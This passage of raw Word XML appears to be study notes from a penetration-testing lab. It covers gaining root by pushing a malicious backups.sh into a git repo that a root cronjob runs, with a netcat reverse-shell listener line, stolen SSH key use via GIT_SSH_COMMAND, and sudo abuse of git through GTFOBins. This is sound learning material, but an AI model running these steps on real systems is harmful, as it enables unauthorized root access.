      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Because the attacker had pushed their malicious update, the cronjob pulled the poisoned backups.sh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003269">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Within 3 minutes, cron executed the modified script as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000326A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The reverse shell connected back to the attacker’s listener:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000326B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwarp nc -lvnp 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000326C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Result: full root shell on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000326D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000326E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Chain Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000326F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1162"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Found root cronjob running scripts from a Git repo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003270">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1162"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Discovered repo was bare and managed by git user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003271">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1162"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Found git user’s private SSH key, used it to access the repo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003272">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1162"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloned repo → modified backups.sh → pushed malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003273">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1162"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cronjob (running as root) auto-pulled changes and executed script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003274">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1162"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious reverse shell triggered → attacker got root access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003275">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003276">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003277">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is GIT_SSH_COMMAND?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003278">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1252"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s an environment variable that tells Git which command to use when it needs to make an SSH connection (for clone, fetch, pull, push, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003279">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1252"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, Git just runs ssh with the system’s standard configuration (your default key, port 22, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000327A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1252"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But if you want Git to use a specific key or non-standard SSH options, you can override it with GIT_SSH_COMMAND.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000327B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000327C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why was GIT_SSH_COMMAND needed in the attack?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000327D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="759"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The git user’s private key (id_rsa) was not the default key in ~/.ssh/.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000327E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="759"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If they just ran git clone git@192.168.93.125:/git-server, Git would fail authentication, because it wouldn’t know to use that stolen key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000327F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="759"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH was running on a non-standard port (43022).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003280">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="759"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Again, the default Git → SSH connection assumes port 22.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003281">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="759"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By setting GIT_SSH_COMMAND, they forced Git to use the stolen key and the correct port for all repo interactions (clone, commit, push, pull).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003282">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003283">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why not login as git user?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003284">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="842"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git could log in, but only via git-shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003285">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="842"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git-shell blocks arbitrary commands, but allows Git repo interactions over SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003286">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="842"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That’s why they didn’t just SSH in and start hacking — instead, they used GIT_SSH_COMMAND locally so that their own Git client could talk to the remote Git server via the restricted shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003287">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003288">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_isuc2lw9arj" w:id="446"/>
      <w:bookmarkEnd w:id="446"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another git example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003289">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000328A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (27.2.2. A Link to the Past)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000328B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000328C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="774700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="391" name="image385.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image385.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1101"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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328D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For context, we found that we can use sudo command on /usr/bin/git </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">without password (using sudo -l) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000328E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000328F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The most promising vector at the moment is to abuse the sudo command /usr/bin/git because we don't have to enter a password. Most commands that run with sudo can be abused to obtain an interactive shell with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003290">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003291">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To find potential abuses when a binary such as git is allowed to run with sudo, we can consult GTFOBins. On this page, we enter git in the search bar and select it in the list. Then, let's scroll down until we reach the Sudo section:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003292">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003293">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2057400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="23" name="image34.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image34.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1102"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2057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294">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003295">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7 shows two of the five potential abuse vectors to elevate privileges via git with sudo privileges. Let's try the first one by setting an environment variable that executes when launching the help menu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003296">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003297">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="889000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="148" name="image138.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image138.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1103"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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3298">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003299">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unfortunately, the output states that we are not allowed to set an environment variable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000329A">
      <w:pPr>
